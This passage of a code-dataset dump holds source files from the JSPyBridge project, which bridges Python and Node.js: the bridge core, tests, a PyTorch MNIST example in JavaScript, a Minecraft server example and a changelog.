print(\"Demo array and object\", demo.arr, demo.obj)\n\n\ndef test_errors():\n try:\n demo.error()\n print(\"Failed to error\")\n exit(1)\n except Exception as e:\n print(\"OK, captured error\")\n\ndef test_valueOf():\n a = demo.arr.valueOf()\n print(\"A\", a)\n assert a[0] == 1\n assert a[1] == 5\n assert a[2] == 3\n print(\"Array\", demo.arr.valueOf())\n\ndef test_once():\n demo.wait()\n once(demo, \"done\")\n\ndef test_assignment():\n demo.x = 3\n\ndef test_eval():\n DemoClass = require(\"./test.js\").DemoClass\n demo = DemoClass(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\n pythonArray = []\n pythonObject = {\"var\": 3}\n\n # fmt: off\n print(eval_js('''\n for (let i = 0; i < 10; i++) {\n await pythonArray.append(i);\n pythonObject[i] = i;\n }\n pythonObject.var = 5;\n const fn = await demo.moreComplex()\n console.log('wrapped fn', await fn()); // Should be 3\n return 2\n '''))\n # fmt: on\n\n print(\"My var\", pythonObject)\n\ndef test_bigint():\n bigInt = eval_js('100000n')\n print(bigInt)\n\ntest_require()\ntest_classes()\ntest_iter()\ntest_callback()\ntest_events()\ntest_arrays()\ntest_errors()\ntest_valueOf()\ntest_once()\ntest_assignment()\ntest_eval()\ntest_bigint()" }, { "alpha_fraction": 0.650697648525238, "alphanum_fraction": 0.6709302067756653, "avg_line_length": 32.85826873779297, "blob_id": "560896cf9250ee435596434123fac7399f6c6644", "content_id": "2aac54b32a0d5ac3ce3936cb5ec2d619ce4b3e70", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4300, "license_type": "permissive", "max_line_length": 186, "num_lines": 127, "path": "/examples/javascript/pytorch-train.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/**\n * A PyTorch NN training example with the MNIST digit dataset using torchvision\n * Ported from https://github.com/pytorch/examples/tree/master/mnist\n */\nimport { py, PyClass, python } from 'pythonia'\npython.setFastMode(true) // bridge skips string serialization; need to use .toString() when console.logging now\nconst torch = await python('torch')\nconst nn = await python('torch.nn')\nconst F = await python('torch.nn.functional')\nconst optim = await python('torch.optim')\nconst { datasets, transforms } = await python('torchvision')\nconst lrs = await python('torch.optim.lr_scheduler')\n\nclass Net extends PyClass {\n constructor () {\n super(nn.Module)\n }\n\n async init () {\n this.conv1 = await nn.Conv2d(1, 32, 3, 1)\n this.conv2 = await nn.Conv2d(32, 64, 3, 1)\n this.dropout1 = await nn.Dropout(0.25)\n this.dropout2 = await nn.Dropout(0.5)\n this.fc1 = await nn.Linear(9216, 128)\n this.fc2 = await nn.Linear(128, 10)\n }\n\n async forward (x) {\n x = await this.conv1(x)\n x = await F.relu(x)\n x = await this.conv2(x)\n x = await F.relu(x)\n x = await F.max_pool2d(x, 2)\n x = await this.dropout1(x)\n x = await torch.flatten(x, 1)\n x = await this.fc1(x)\n x = await F.relu(x)\n x = await this.dropout2(x)\n x = await this.fc2(x)\n const output = await F.log_softmax$(x, { dim: 1 })\n return output\n }\n}\n\nasync function train (log_interval, dry_run, model, device, trainLoader, optimizer, epoch) {\n await model.train()\n for await (let [_batchIx, [data, target]] of await py.enumerate(trainLoader)) {\n data = await data.to(device)\n target = await target.to(device)\n await optimizer.zero_grad()\n const output = await model(await data)\n const loss = await F.nll_loss(output, await target)\n await loss.backward()\n await optimizer.step()\n const batchIx = await _batchIx\n if ((batchIx % log_interval) === 0) {\n console.log(`Train epoch: ${epoch} [${batchIx * await data.length}/${await trainLoader.dataset.length} (${100 * batchIx / await trainLoader.length}%)]\\tLoss: ${await loss.item()}`)\n }\n if (dry_run) break\n }\n}\n\nasync function test (model, device, testLoader) {\n await model.eval()\n let testLoss = 0\n let correct = 0\n\n await py.with(torch.no_grad(), async () => {\n for await (let [data, target] of testLoader) {\n data = await data.to(device)\n target = await target.to(device)\n const output = await model(data)\n const loss = await F.nll_loss$(output, await target, { reduction: 'sum' })\n testLoss += await loss.item()\n const pred = await output.argmax$({ dim: 1, keepdim: true })\n correct += await pred.eq(await target.view_as(pred)).then(k => k.sum()).then(k => k.item())\n }\n })\n\n testLoss /= await testLoader.dataset.length\n console.log(`\\nTest set: Average loss: ${testLoss}, Accuracy: ${correct}/${await testLoader.dataset.length} (${(100 * correct) / await testLoader.dataset.length}%)\\n`)\n}\n\nconst batch_size = 100\nconst test_batch_size = 1000\nconst epochs = 1\nconst lr = 1\nconst gamma = 0.7\nconst no_cuda = true\nconst dry_run = true\nconst seed = 1\nconst log_interval = 10\nconst save_model = true\n\nconst use_cuda = !no_cuda && await torch.cuda.is_available()\nawait torch.manual_seed(seed)\n\nconst device = use_cuda ? 'cuda' : 'cpu'\n\nconst transform = await transforms.Compose([\n await transforms.ToTensor(),\n await transforms.Normalize([0.1306], [0.3081])\n])\n\nconst dataset1 = await datasets.MNIST$('./torch_data', { train: true, download: true, transform })\nconst dataset2 = await datasets.MNIST$('./torch_data', { train: false, download: true, transform })\n\nconst trainLoader = await torch.utils.data.DataLoader$(dataset1, { batch_size })\nconst testLoader = await torch.utils.data.DataLoader$(dataset2, { batch_size: test_batch_size })\n\nconst net = await Net.init()\nconst model = await net.to(device)\nconst optimizer = await optim.Adadelta$(await model.parameters(), { lr })\n\nconst scheduler = await lrs.StepLR$(optimizer, { step_size: 1, gamma })\n\nfor (let epoch = 0; epoch < epochs + 1; epoch++) {\n await train(log_interval, dry_run, model, device, trainLoader, optimizer, epoch)\n await test(model, device, testLoader)\n await scheduler.step()\n}\n\nif (save_model) {\n await torch.save(await model.state_dict(), 'mnist_cnn.pt')\n}\n\npython.exit()\n" }, { "alpha_fraction": 0.47229915857315063, "alphanum_fraction": 0.48268696665763855, "avg_line_length": 29.10416603088379, "blob_id": "9f3ac53303d31e122e4e2b11404a3a932c01d678", "content_id": "b6a3780fa485d185c4a1bf28816df08be22eec1e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1444, "license_type": "permissive", "max_line_length": 74, "num_lines": 48, "path": "/examples/python/nbt.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# Named Binary Tag (NBT) serialization format\nfrom javascript import require, globalThis\nJSON = globalThis.JSON\nnbt = require(\"prismarine-nbt\", \"latest\")\n\nprint(nbt.comp({\n 'Armor': nbt.list(nbt.comp([\n {\n 'Count': nbt.byte(1),\n 'Damage': nbt.short(0),\n 'Name': nbt.string('helmet')\n }\n ]))\n}))\n\n\ndef cross_encode():\n write = {\n \"type\": \"compound\",\n \"name\": \"\",\n \"value\": {\n \"FireworksItem\": {\n \"type\": \"compound\",\n \"value\": {\n \"FireworkColor\": {\"type\": \"byteArray\", \"value\": [11]},\n \"FireworkFade\": {\"type\": \"byteArray\", \"value\": []},\n \"FireworkFlicker\": {\"type\": \"int\", \"value\": -79},\n \"FireworkTrail\": {\"type\": \"int\", \"value\": 22},\n \"FireworkType\": {\"type\": \"byte\", \"value\": 0},\n },\n },\n \"customColor\": {\"type\": \"long\", \"value\": [-1, -75715]},\n },\n }\n\n\n tests = ['big', 'little']\n for test in tests:\n written = nbt.writeUncompressed(write, test)\n parsed = nbt.parse(written).parsed\n assert JSON.stringify(parsed) == JSON.stringify(write)\n \n for _test in tests:\n _written = nbt.writeUncompressed(parsed, _test)\n _ = nbt.parse(written)\n assert JSON.stringify(_.parsed) == JSON.stringify(write)\n\ncross_encode()" }, { "alpha_fraction": 0.5512424111366272, "alphanum_fraction": 0.5539906024932861, "avg_line_length": 30.078290939331055, "blob_id": "8d1454a895c9c19f76a714ca435ed679dafc33f2", "content_id": "f89f06b6767b5ac5e47d7519430cd2622ac2ed3d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8733, "license_type": "permissive", "max_line_length": 118, "num_lines": 281, "path": "/src/javascript/js/bridge.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "if (typeof process !== 'undefined' && parseInt(process.versions.node.split('.')[0]) < 14) {\n console.error('Your node version is currently', process.versions.node)\n console.error('Please update it to a version >= 14.x.x from https://nodejs.org/')\n process.exit(1)\n}\n/**\n * The JavaScript Interface for Python\n */\nconst util = require('util')\nconst { PyBridge } = require('./pyi')\nconst { $require } = require('./deps')\nconst { once } = require('events')\n\nconst debug = process.env.DEBUG?.includes('jspybridge') ? console.debug : () => { }\nconst colors = process.env.FORCE_COLOR !== '0'\n\nfunction getType (obj) {\n if (obj?.ffid) return 'py'\n if (typeof obj === 'function') {\n // Some tricks to check if we have a function, class or object\n if (obj.prototype) {\n // SO ... we COULD automatically call new for ES5 functions, but this gets complicated.\n // Since old ES5 classes can be called both with and without new, but with different\n // behavior. By forcing the new operator, we can no longer access ES5 classes variables\n // because of lack of support in proxy.py for functions with variables inside.. So instead\n // just don't call `new` for non-ES6 classes and let the user use the .new() psuedomethod.\n // The below could would check if the prototype has functions in it and assume class if so.\n // const props = Object.getOwnPropertyNames(obj.prototype)\n // if (props.length > 1) return 'class'\n // The below code just checks to see if we have an ES6 class (non-writable)\n const desc = Object.getOwnPropertyDescriptor(obj, 'prototype')\n if (!desc.writable) return 'class'\n }\n\n return 'fn'\n }\n if (typeof obj === 'bigint') return 'big'\n if (typeof obj === 'object') return 'obj'\n if (!isNaN(obj)) return 'num'\n if (typeof obj === 'string') return 'string'\n}\n\nclass Bridge {\n constructor (ipc) {\n // This is an ID that increments each time a new object is returned\n // to Python.\n this.ffid = 0\n // This contains a refrence map of FFIDs to JS objects.\n this.m = {\n 0: {\n console,\n require: $require,\n _require: require,\n globalThis,\n RegExp,\n once,\n needsNodePatches: () => {\n const [major, minor] = process.versions.node.split('.')\n if ((major == 14 && minor < 17) || (major == 15)) { // eslint-disable-line\n return true\n }\n return false\n },\n async evaluateWithContext ($block, $locals) {\n const $variables = Object.keys($locals)\n const $inputs = $variables.map(v => `$locals[\"${v}\"]`)\n const $code = ($block.split('\\n').length === 1 && !$block.includes('return ')) ? 'return ' + $block : $block\n const $finalCode = `(async (${$variables.join(', ')}) => { ${$code} })(${$inputs.join(', ')})`\n return await eval($finalCode)\n }\n }\n }\n this.ipc = ipc\n this.pyi = new PyBridge(this.ipc, this)\n this.eventMap = {}\n\n // ipc.on('message', this.onMessage)\n }\n\n addWeakRef (object, ffid) {\n const weak = new WeakRef(object)\n Object.defineProperty(this.m, ffid, {\n get () {\n return weak.deref()\n }\n })\n }\n\n async get (r, ffid, attr) {\n try {\n var v = await this.m[ffid][attr]\n var type = v.ffid ? 'py' : getType(v)\n } catch (e) {\n return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n set (r, ffid, attr, [val]) {\n try {\n this.m[ffid][attr] = val\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n this.ipc.send({ r, key: '', val: true })\n }\n\n // Call property with new keyword to construct classes\n init (r, ffid, attr, args) {\n // console.log('init', r, ffid, attr, args)\n this.m[++this.ffid] = attr ? new this.m[ffid][attr](...args) : new this.m[ffid](...args)\n this.ipc.send({ r, key: 'inst', val: this.ffid })\n }\n\n // Call function with async keyword (also works with sync funcs)\n async call (r, ffid, attr, args) {\n try {\n if (attr) {\n var v = await this.m[ffid][attr].apply(this.m[ffid], args) // eslint-disable-line\n } else {\n var v = await this.m[ffid](...args) // eslint-disable-line\n }\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n const type = getType(v)\n // console.log('GetType', type, v)\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n // Fix for functions that return functions, use .call() wrapper\n // this.m[++this.ffid] = { call: v }\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n // called for debug in JS, print() in python via __str__\n async inspect (r, ffid) {\n const s = util.inspect(await this.m[ffid], { colors })\n this.ipc.send({ r, val: s })\n }\n\n // for __dict__ in python (used in json.dumps)\n async serialize (r, ffid) {\n const v = await this.m[ffid]\n this.ipc.send({ r, val: v.valueOf() })\n }\n\n async keys (r, ffid) {\n const v = await this.m[ffid]\n const keys = Object.getOwnPropertyNames(v)\n this.ipc.send({ r, keys })\n }\n\n free (r, ffid, attr, args) {\n for (const id of args) {\n delete this.m[id]\n }\n }\n\n process (r, args) {\n const made = {}\n let madeCount = 0\n const parse = input => {\n if (typeof input !== 'object') return\n for (const k in input) {\n const v = input[k]\n if (v && typeof v === 'object') {\n if (v.r && v.ffid === '') {\n ++this.ffid\n const proxy = this.pyi.makePyObject(this.ffid)\n this.m[this.ffid] = proxy\n made[input[k].r] = this.ffid\n input[k] = proxy\n madeCount++\n } else if (v.ffid) {\n input[k] = this.m[v.ffid]\n } else {\n parse(v)\n }\n } else {\n parse(v)\n }\n }\n }\n parse(args)\n // We only need to reply if we made some Proxies\n if (madeCount) this.ipc.send({ r, key: 'pre', val: made })\n }\n\n async onMessage ({ r, action, p, ffid, key, args }) {\n // console.debug('onMessage!', arguments, r, action)\n try {\n if (p) {\n this.process(r + 1, args)\n }\n await this[action](r, ffid, key, args)\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n }\n}\n\nObject.assign(util.inspect.styles, {\n bigint: 'yellow',\n boolean: 'yellow',\n date: 'magenta',\n module: 'underline',\n name: 'blueBright',\n null: 'bold',\n number: 'yellow',\n regexp: 'red',\n special: 'magentaBright', // (e.g., Proxies)\n string: 'green',\n symbol: 'blue',\n undefined: 'grey'\n})\n\nconst handlers = {}\n\nconst ipc = {\n send: data => {\n debug('js -> py', data)\n process.stderr.write(JSON.stringify(data) + '\\n')\n },\n writeRaw: (data, r, cb) => {\n debug('js -> py', data)\n handlers[r] = cb\n process.stderr.write(data + '\\n')\n },\n write (data, cb) {\n handlers[data.r] = cb\n this.send(data)\n }\n}\n\nconst bridge = new Bridge(ipc)\nprocess.stdin.on('data', data => {\n const d = String(data)\n debug('py -> js', d)\n for (const line of d.split('\\n')) {\n try { var j = JSON.parse(line) } catch (e) { continue } // eslint-disable-line\n if (j.c === 'pyi') {\n handlers[j.r]?.(j)\n } else {\n bridge.onMessage(j)\n }\n }\n})\n\nprocess.on('exit', () => {\n debug('** Node exiting')\n})\n// console.log('JS Started!')\n" }, { "alpha_fraction": 0.46529969573020935, "alphanum_fraction": 0.48422712087631226, "avg_line_length": 14.850000381469727, "blob_id": "612b2b4e3eb653c7f2a7a1811707ac7d73e0eee6", "content_id": "bb4e8213ca752eee2cf0b0d954d5fab911573d17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1268, "license_type": "permissive", "max_line_length": 69, "num_lines": 80, "path": "/test/javascript/test.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const { EventEmitter } = require('events')\n\nclass DemoClass extends EventEmitter {\n constructor (color, { a }) {\n super()\n this.color = color\n this.y = a\n this.arr = [1, 2, 3]\n this.obj = { a: 'ay', b: 'be', c: 'ce' }\n }\n\n increment () {\n this.y++\n setInterval(() => {\n this.emit('increment', () => 3, this.y++, { a: { y: this.y } })\n }, 20)\n }\n\n get () {\n return this.y\n }\n\n array () {\n return [[], 5, 6, 7, 8, { a: this.y }]\n }\n\n object () {\n return { x: 2, y: 3, z: 1 }\n }\n\n async other (clas) {\n return (await clas.y) + 2\n }\n\n moreComplex () {\n return () => 3\n }\n\n async callback (cb) {\n const { python } = globalThis.JSPyBridge\n const numpy = await python('math')\n console.log('callback from JS', cb, await numpy.sqrt(9))\n await cb('It works !')\n }\n\n complex () {\n return {\n y: () => 2,\n x: 3\n }\n }\n\n error () {\n throw Error('This should fail')\n }\n\n ok () {\n function someMethod (a, b, c) {\n return a + b + c\n }\n someMethod.x = 'wow'\n return someMethod\n }\n\n wait () {\n setTimeout(() => {\n this.emit('done')\n }, 400)\n }\n\n static hello () {\n return 'world'\n }\n\n toString () {\n return '123!'\n }\n}\n\nmodule.exports = { DemoClass }\n" }, { "alpha_fraction": 0.6158047914505005, "alphanum_fraction": 0.6336489319801331, "avg_line_length": 24.425926208496094, "blob_id": "5e650150ea21f22525faa5b27b19af3dcb913264", "content_id": "e050035277c7e953dcb62b5db26fdaa6e1f5d29e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2746, "license_type": "permissive", "max_line_length": 72, "num_lines": 108, "path": "/test/pythonia.test.mjs", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "// process.env.DEBUG = 1\nimport { py, python, PyClass } from 'pythonia'\nimport assert from 'assert'\nconst f = await python('./pythonia/pyImp.py')\nconst demo = await python('./pythonia/demo.py')\n\n// async function it (what, fn) {\n// console.log('it', what)\n// await fn()\n// }\n\nawait it('does function calls', async function () {\n console.log('ok', await f.add_inverse)\n assert.strictEqual(await f.add_inverse(3, 2), -5)\n const complex = await f.complex_num()\n console.log('complex', complex)\n console.log('real & complex', await complex.real, await complex.imag)\n console.log('FABC - this will fail', f.a.b.c)\n})\n\nawait it('declares classes', async function () {\n class MyClas extends PyClass {\n constructor () {\n super(demo.DemoClass, [4])\n }\n\n someMethod () {\n return 3\n }\n }\n\n await f.some_event(async (message, method) => {\n // Call a Python function passed as a paramater\n assert.strictEqual(message, 'from python')\n assert.strictEqual(await method(), 3)\n // console.log('Message', message, await method())\n }, await MyClas.init())\n})\n\nawait it('consumes classes', async function () {\n const { DemoClass, add } = demo\n const demoInst = await DemoClass(3)\n assert.ok(demoInst)\n console.log(demoInst)\n})\n\nawait it('catches errors', async function () {\n try {\n await demo.throw()\n } catch (e) {\n console.log('OK!')\n }\n})\n\nawait it('calls functions with special args', async function () {\n await demo.special$(1, 2, { kwarg1: 3, extra: 77, xx: Math.random() })\n})\n\nawait it('can add Python numbers', async function () {\n const num = py`3j`\n const num2 = py`2j`\n console.log('3 + 3', await py`3+3 + ${num} + ${num2}`)\n})\n\nawait it('can set variables', async function () {\n f.x[2] = 4\n console.log(await f.x)\n f.y.b = 'meow'\n console.log(await f.y)\n f.a.prop = 44\n assert.strictEqual(await f.a.prop, 44)\n // console.log(await f.a.prop)\n})\n\nawait it('can return primitive values', async function () {\n const arr = await f.x.valueOf()\n console.log(arr, typeof arr)\n assert.strictEqual(arr.toString(), '1,2,4')\n})\n\nawait it('can iterate asynchronously', async function () {\n const array = await f.x\n let v = 0\n for await (const entry of array) {\n console.log(entry)\n v += entry\n }\n assert.strictEqual(v, 7)\n})\n\nawait it('can iterate from Python', async function () {\n const a = await f.iter({ x: 1, y: 2, z: 3 })\n const b = await f.iter([1, 2, 3])\n assert.deepEqual(await a.valueOf(), ['x', 'y', 'z'])\n assert.deepEqual(await b.valueOf(), [1, 2, 3])\n})\n\nawait it('can recieve big numbers', async function () {\n const bigNumber = await py`2**63`\n console.log(bigNumber)\n assert.ok(bigNumber > 2 ** 60)\n})\n\n// process.exit(0)\n\nafter(() => {\n python.exit()\n})\n" }, { "alpha_fraction": 0.5597295165061951, "alphanum_fraction": 0.5627347826957703, "avg_line_length": 25.6200008392334, "blob_id": "f968c7b46b4c0d81ec840611be28ab783e6bf44f", "content_id": "d4a0df5a195232c4f2e5eb1ad31eac10ae1f9961", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1331, "license_type": "permissive", "max_line_length": 76, "num_lines": 50, "path": "/src/pythonia/interface.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "from Bridge import Bridge\nimport sys, os, socket, json\n\napiin = apiout = None\n\n\nclass Ipc:\n def queue(self, what):\n global apiout\n try:\n if type(what) == str:\n apiout.write(what + \"\\n\")\n else:\n apiout.write(json.dumps(what) + \"\\n\")\n apiout.flush()\n except Exception:\n # Quit if we are unable to write (is the parent process dead?)\n sys.exit(1)\n\n\nipc = Ipc()\nbridge = Bridge(ipc)\n\n# The communication stuffs\n# This is the communication thread which allows us to send and\n# recieve different messages at the same time.\ndef com_io():\n global apiin, apiout\n if sys.platform == \"win32\" or (\"NODE_CHANNEL_FD\" not in os.environ):\n apiin = sys.stdin\n apiout = sys.stderr\n else:\n fd = int(os.environ[\"NODE_CHANNEL_FD\"])\n api = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)\n apiin = api.makefile(\"r\")\n apiout = api.makefile(\"w\")\n ipc.readline = apiin.readline\n while True:\n data = apiin.readline()\n if not data:\n break\n if data[0] != \"{\":\n continue\n j = json.loads(data)\n bridge.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n\n\n# import cProfile\n# cProfile.run('com_io()', sort='time')\ncom_io()\n" }, { "alpha_fraction": 0.5595777034759521, "alphanum_fraction": 0.6033182740211487, "avg_line_length": 18.52941131591797, "blob_id": "8caf66e30d26018c165da8323e5b3abdc5d36591", "content_id": "0ae317560f4509427f4b1911c1c4c7449017e958", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "permissive", "max_line_length": 54, "num_lines": 34, "path": "/examples/python/flyingsquid.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time\nfrom javascript import require\nmcServer = require('flying-squid')\n\nmcServer.createMCServer({\n 'motd': 'A Minecraft Server \\nRunning flying-squid',\n 'port': 25565,\n 'max-players': 10,\n 'online-mode': True,\n 'logging': True,\n 'gameMode': 1,\n 'difficulty': 1,\n 'worldFolder': 'world',\n 'generation': {\n 'name': 'diamond_square',\n 'options': {\n 'worldHeight': 80\n }\n },\n 'kickTimeout': 10000,\n 'plugins': {\n\n },\n 'modpe': False,\n 'view-distance': 10,\n 'player-list-text': {\n 'header': 'Flying squid',\n 'footer': 'Test server'\n },\n 'everybody-op': True,\n 'max-entities': 100,\n 'version': '1.16.1'\n})\ntime.sleep(1000)" }, { "alpha_fraction": 0.7092555165290833, "alphanum_fraction": 0.7419517040252686, "avg_line_length": 38.779998779296875, "blob_id": "ffe2395c9f2ca2092440b2590b22b94c6c5e7e0a", "content_id": "15654789b375916e649f337b4152484a81cfc61b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1988, "license_type": "permissive", "max_line_length": 154, "num_lines": 50, "path": "/HISTORY.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "## 0.2.12\n* Iterate over non-arrays in JavaScript from Python [#29](https://github.com/extremeheat/JSPyBridge/pull/29)\n\n## 0.2.11\n* py: add an `--install <npm package>` option to the CLI to install internal packages outside of scripts\n\n## 0.2.10\n* Expose JSPyBridge on both sides of bridge. On python via `os.JSPyBridge` and via `globalThis.JSPyBridge` in Node.js.\n* Customizable Node.js/Python binary path through `NODE_BIN` and `PYTHON_BIN` enviornment flags\n* js: (Windows) Fix Electron stdout crashing issue\n* py: RegExp is now exposed top-level for easier usability\n\n## 0.2.9\n* py: Improve error handling on Python process exit.\n\n## 0.2.7\n* py: Add new JavaScript expression evaluator\n\n## 0.2.6\n* py: Add new top-level `once` export, alias to Node.js's events function.\n\n## 0.2.5\n* py: Support Node versions 14+\n\n## 0.2.3\n* py: Add notebook and Google Colab support [#15](https://github.com/extremeheat/JSPyBridge/pull/15)\n* py: CLI now has a new --update flag to update internal, Node.js dependencies. Now use --clean to reset the package store.\n\n## 0.2.3\n* Add support for `in` operator in Python code\n* IO/error handling updates [#14](https://github.com/extremeheat/JSPyBridge/pull/14)\n\n## 0.2.2\n* py: Add new CLI to clear the internal node_module cache, can now be cleared with `python -m javascript clear`\n\n## 0.2.1\n* Initial release of bridge to access JavaScript from Python\n* py: Fix issue with dependency installer\n* py: Fix issue with error handler and issues with IPython\n\n## 0.2.0\n* Importing relative Python files now automatically adds the file's directory to the import path [#10](https://github.com/extremeheat/JSPyBridge/pull/10) \n* Automatically restart Python processes on a new Python import, if python was exit()'ed earlier\n* Fix relative imports on Windows not splitting \\ correctly\n* Fix readme typo (@Heath123) [#9](https://github.com/extremeheat/JSPyBridge/pull/9)\n* Documentation fixes\n\n## 0.1.0\n\n* Initial release of bridge to access Python from JavaScript" }, { "alpha_fraction": 0.6344212293624878, "alphanum_fraction": 0.6374735832214355, "avg_line_length": 31.265151977539062, "blob_id": "4f7ef1b14ed66296351f4f992a97fe50996ad499", "content_id": "6ec9d8e8ade8fb9b8bbb8f2f474dd796f77a5714", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4259, "license_type": "permissive", "max_line_length": 95, "num_lines": 132, "path": "/src/javascript/__init__.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# This file contains all the exposed modules\nfrom . import config, proxy, events\nimport threading, inspect, time, atexit, os, sys\n\n\ndef init():\n if config.event_loop:\n return # Do not start event loop again\n config.event_loop = events.EventLoop()\n config.event_thread = threading.Thread(target=config.event_loop.loop, args=(), daemon=True)\n config.event_thread.start()\n config.executor = proxy.Executor(config.event_loop)\n config.global_jsi = proxy.Proxy(config.executor, 0)\n atexit.register(config.event_loop.on_exit)\n\n if config.global_jsi.needsNodePatches():\n config.node_emitter_patches = True\n\n\ninit()\n\n\ndef require(name, version=None):\n calling_dir = None\n if name.startswith(\".\"):\n # Some code to extract the caller's file path, needed for relative imports\n try:\n namespace = sys._getframe(1).f_globals\n cwd = os.getcwd()\n rel_path = namespace[\"__file__\"]\n abs_path = os.path.join(cwd, rel_path)\n calling_dir = os.path.dirname(abs_path)\n except Exception:\n # On Notebooks, the frame info above does not exist, so assume the CWD as caller\n calling_dir = os.getcwd()\n\n return config.global_jsi.require(name, version, calling_dir, timeout=900)\n\n\nconsole = config.global_jsi.console # TODO: Remove this in 1.0\nglobalThis = config.global_jsi.globalThis\nRegExp = config.global_jsi.RegExp\n\n\ndef eval_js(js):\n frame = inspect.currentframe()\n rv = None\n try:\n local_vars = {}\n for local in frame.f_back.f_locals:\n if not local.startswith(\"__\"):\n local_vars[local] = frame.f_back.f_locals[local]\n rv = config.global_jsi.evaluateWithContext(js, local_vars, forceRefs=True)\n finally:\n del frame\n return rv\n\n\ndef AsyncTask(start=False):\n def decor(fn):\n fn.is_async_task = True\n t = config.event_loop.newTaskThread(fn)\n if start:\n t.start()\n\n return decor\n\n\nstart = config.event_loop.startThread\nstop = config.event_loop.stopThread\nabort = config.event_loop.abortThread\n\n# You must use this Once decorator for an EventEmitter in Node.js, otherwise\n# you will not be able to off an emitter.\ndef On(emitter, event):\n # print(\"On\", emitter, event,onEvent)\n def decor(_fn):\n # Once Colab updates to Node 16, we can remove this.\n # Here we need to manually add in the `this` argument for consistency in Node versions.\n # In JS we could normally just bind `this` but there is no bind in Python.\n if config.node_emitter_patches:\n\n def handler(*args, **kwargs):\n _fn(emitter, *args, **kwargs)\n\n fn = handler\n else:\n fn = _fn\n\n emitter.on(event, fn)\n # We need to do some special things here. Because each Python object\n # on the JS side is unique, EventEmitter is unable to equality check\n # when using .off. So instead we need to avoid the creation of a new\n # PyObject on the JS side. To do that, we need to persist the FFID for\n # this object. Since JS is the autoritative side, this FFID going out\n # of refrence on the JS side will cause it to be destoryed on the Python\n # side. Normally this would be an issue, however it's fine here.\n ffid = getattr(fn, \"iffid\")\n setattr(fn, \"ffid\", ffid)\n config.event_loop.callbacks[ffid] = fn\n return fn\n\n return decor\n\n\n# The extra logic for this once function is basically just to prevent the program\n# from exiting until the event is triggered at least once.\ndef Once(emitter, event):\n def decor(fn):\n i = hash(fn)\n\n def handler(*args, **kwargs):\n if config.node_emitter_patches:\n fn(emitter, *args, **kwargs)\n else:\n fn(*args, **kwargs)\n del config.event_loop.callbacks[i]\n\n emitter.once(event, handler)\n config.event_loop.callbacks[i] = handler\n\n return decor\n\n\ndef off(emitter, event, handler):\n emitter.off(event, handler)\n del config.event_loop.callbacks[getattr(handler, \"ffid\")]\n\n\ndef once(emitter, event):\n val = config.global_jsi.once(emitter, event, timeout=1000)\n return val\n" }, { "alpha_fraction": 0.6985413432121277, "alphanum_fraction": 0.7001620531082153, "avg_line_length": 22.730770111083984, "blob_id": "6d4467dab643ee59990ef663194afb6569c3a328", "content_id": "fc6ce1b26be77bb88c170c993e44b042ea4c8178", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 617, "license_type": "permissive", "max_line_length": 91, "num_lines": 26, "path": "/src/javascript/config.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import os\n\nevent_loop = None\nevent_thread = None\nexecutor = None\n# The \"root\" interface to JavaScript with FFID 0\nglobal_jsi = None\n# 